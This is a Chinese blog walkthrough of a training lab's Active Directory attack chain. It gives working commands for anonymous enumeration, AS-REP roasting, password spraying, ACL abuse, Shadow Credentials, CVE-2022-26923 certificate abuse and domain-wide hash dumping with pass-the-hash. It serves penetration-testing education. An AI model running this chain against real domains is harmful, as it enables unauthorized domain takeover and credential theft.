文章总结: 本文档详述了ChaosCorp内网靶场的官方渗透思路,涵盖匿名枚举、ASREPRoasting攻击、ACL滥用及ShadowCredentials等横向移动技术。核心利用点在于通过ADCS服务漏洞CVE-2022-26923,创建伪造机器账户并修改DNS主机名申请证书,最终获取域控权限,展示了内网渗透中凭证窃取与证书服务结合的高级攻击路径。
综合评分: 85
文章分类: 渗透测试,内网渗透,漏洞分析,实战经验,漏洞POC
[无境原创] Chaos Corp 官方wp发布
原创
棉花糖糖糖
棉花糖糖糖
棉花糖fans
2026年1月28日 11:40
四川
前言
vip.bdziyi.com/ulab,无境,英文名Unbounded Lab,是专为网络安全学习者打造的综合性实战平台,提供真实企业级漏洞环境,让您在安全的环境中提升实战技能,核心特色:独立隔离环境,每位用户都拥有完全独立的靶场环境,即使是庞大的内网靶场,环境之间也是零干扰,确保您的学习过程不受任何影响。
Chaos Corp 靶场已加入无境原创计划,该环境奖励投稿会员 Scarecrow 666元人民币,本文为官方wp,与此同时,该系列第二个靶场Time & Machines 已上架,官方wp发布后,rank与难度将减半。
#
WP开始:扫描
image-20260108161021248
该机器有极大可能为DC
匿名获取信息
匿名枚举用户
nxc smb 192.168.111.10 -u ' ' -p '' --users
image-20260108160247808
尝试其他方法
impacket-lookupsid ' ':''@192.168.111.10 -no-pass
image-20260108160637994
获取到以下用户
image-20260108160710969
匿名枚举共享
nxc smb 192.168.111.10 -u ' ' -p '' --shares
image-20260108160320051
访问匿名共享 New
smbclient //192.168.111.10/New -U ' '%''
image-20260108160800590
以 GBK 编码查看文件获取到一个新员工账户
image-20260108160926576
域信息收集
bloodhound 信息收集
Kali 默认没有安装 bloodhound,可以根据下面的文档安装
bloodhound | Kali Linux Tools
bloodhound-python -c All -u newmht -p 'New@1234' -ns 192.168.111.10 -d sec.org -dc ad.sec.org --zip
image-20260108162459074
但是这个账号没有利用的东西
image-20260108162630934
asreproast
经过详细的查找,找到了一个用户可以进行 asreproast
image-20260108163050417
nxc ldap 192.168.111.10 -u newmht -p 'New@1234' --asreproast ASREPROAST --kdcHost 192.168.111.10
image-20260108163223851
进行密码爆破
john --wordlist=/usr/share/wordlists/rockyou.txt ASREPROAST
image-20260108163416753
image-20260108163531937
这个账户属于人事部,但是也没有见到利用的路径,只能尝试一下密码喷射域内所有的用户,幸运地获取到 Moly 的密码
nxc smb 192.168.111.10 -u users.txt -p 'mahalkita'
image-20260108163755305
Shadow Credentials
分析 Moly,发现 Moly 对 开发部 这个安全组有 WriteOwner 的权限
image-20260108163956339
暂时考虑为 Shadow Credentials,但是还得看是否满足下面的4个条件
image-20260108171243073
回头看扫描结果,发现有636端口,尝试访问域控证书的端点
curl -k http://192.168.111.10/certsrv/
image-20260108170528531
image-20260108170603243
共享也可以看到开放了证书服务
image-20260108180946180
再看一下系统版本,有可能是 Windows Server 2016
image-20260108170827619
剩下的条件:
能改变某个账号的msDS-KeyCredentialLink属性,就能获得这个账号的TGT和NTLM Hash
certipy-ad find -u '[email protected]' -p 'mahalkita' -dc-ip 192.168.111.10 -vulnerable
image-20260108171713608
从结果来看好像没有什么有用的信息,那就直接利用试试
# 修改权限
impacket-dacledit \
-action write \
-rights WriteMembers \
-principal 'Moly' \
-target-dn 'CN=Dev,DC=sec,DC=org' \
-dc-ip 192.168.111.10 \
'sec.org/Moly:mahalkita'
image-20260108172036408
# 将 Moly 加入 开发部 这个组
bloodyAD --host 192.168.111.10 -d sec.org -u Moly -p 'mahalkita' set owner '开发部' Moly
image-20260108171940791
certipy-ad shadow auto -u [email protected] -p mahalkita -dc-ip 192.168.111.10 -account Cook
image-20260108172227583
先关闭虚拟机的时间同步,再同步域控时间
image-20260127133818404
请求失败是因为域控和Kali时间差距过大,需要从域控同步时间
# 同步域控时间
ntpdate -4 -b 192.168.111.10
# 再次请求
certipy-ad shadow auto -u [email protected] -p mahalkita -dc-ip 192.168.111.10 -account Cook
image-20260108174827887
如果还是不行,可以尝试
apt install chrony -y
# 编辑配置,取消 pool的注释
vim /etc/chrony/chrony.conf
server 192.168.111.10 iburst
systemctl restart chrony
# 检查源状态
chronyc sources -v
# 手动强制同步
ntpdate -4 -b 192.168.111.10 # 也可以一起使用
chronyc makestep
chronyc tracking
image-20260108175639499
同步成功的判断
# 同步需要点时间,大概三分钟
# chronyc tracking 显示 MS Name(192.168.111.10)一致
# Last 接近 0
image-20260108175137073
ACL 滥用
Cook 对 Jock 有 ForceChangePassword 的权限
image-20260108164239242
先利用 Cook 的 hash 修改 Cook 自身的里面
impacket-changepasswd -hashes :8ac71e8fdb3f7468c3b0d80611dee7e4 sec.org/[email protected] -newpass '123456'
# 修改 Jock 的密码为 123456
net rpc password "Jock" -U "sec.org"/"Cook"%"123456" -S 192.168.111.10
image-20260108175513019
Jock 对 MHT 有 GenericAll 权限
image-20260108164309568
# 修改 mht 的密码为 123456
net rpc password mht -U 'sec.org'/'Jock'%'123456' -S 192.168.111.10
image-20260108175615872
但是到 MHT 这里,利用的线索又断开了
image-20260108164432578
Certificate Services
mht的线索断开了,但是先尝试使用 Moly 的密码来请求域证书
- 查找 CA 名称
certipy-ad find -u '[email protected]' -p 'mahalkita' -target 192.168.111.10
image-20260108180508190
- 请求证书
certipy-ad req -u '[email protected]' -p 'mahalkita' -target 192.168.111.10 -ca sec-AD-CA -template User
image-20260108180716995
最后逐个尝试,只有 mht 能正常请求证书
certipy-ad req -u '[email protected]' -p '123456' -target 192.168.111.10 -ca sec-AD-CA -template User
image-20260108180820962
只能考虑是否有 ADCS 权限提升漏洞
CVE-2022-26923
- 查询是否可以创建计算机账户
ldapsearch -x -H ldap://192.168.111.10 -D '[email protected]' -w '123456' -b 'DC=sec,DC=org' -s base ms-DS-MachineAccountQuota
image-20260108182025951
- 添加计算机账户
impacket-addcomputer 'sec.org/mht:123456' -computer-name 'cve' -computer-pass 'cve@123456' -dc-ip 192.168.111.10
image-20260108181159900
- 修改 dNSHostName
bloodyAD -d sec.org -u mht -p '123456' --host 192.168.111.10 set object 'CN=cve,CN=Computers,DC=sec,DC=org' dNSHostName -v 'ad.sec.org'
image-20260108181228448
- 请求 AD$ 的证书
certipy-ad req -u '[email protected]' -p 'cve@123456' -target 192.168.111.10 -ca sec-AD-CA -template Machine -ldap-scheme ldap
image-20260108181256487
- 证书传递
certipy-ad auth -pfx ad.pfx -dc-ip 192.168.111.10
image-20260108181320196
- 导出域内所有哈希
impacket-secretsdump 'sec.org/[email protected]' -hashes :af09c873164ed481ecf0f6230966d0ad -target-ip 192.168.111.10 -just-dc
image-20260108181351448
impacket-wmiexec -hashes :6f4009ffe6f419f6ebef8c5c4495f26f 'sec.org'/[email protected] -target-ip 192.168.111.10 -codec gbk
image-20260108181618272
当然 ESC4 + ESC1 也可以利用
certipy-ad template -u '[email protected]' -p 'CEO@Hacked123' -dc-ip 192.168.111.10 -template 'User' -write-default-configuration
certipy-ad req -u [email protected] -p 'CEO@Hacked123' -dc-ip 192.168.111.10 -ca 'sec-AD-CA' -template 'User' -upn '[email protected]' -target 192.168.111.10
广告时间:
棉花糖会员站介绍(25年11月15日版本) 新增在线独立环境内网靶场
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:棉花糖fans 棉花糖糖糖
棉花糖糖糖《[无境原创] Chaos Corp 官方wp发布》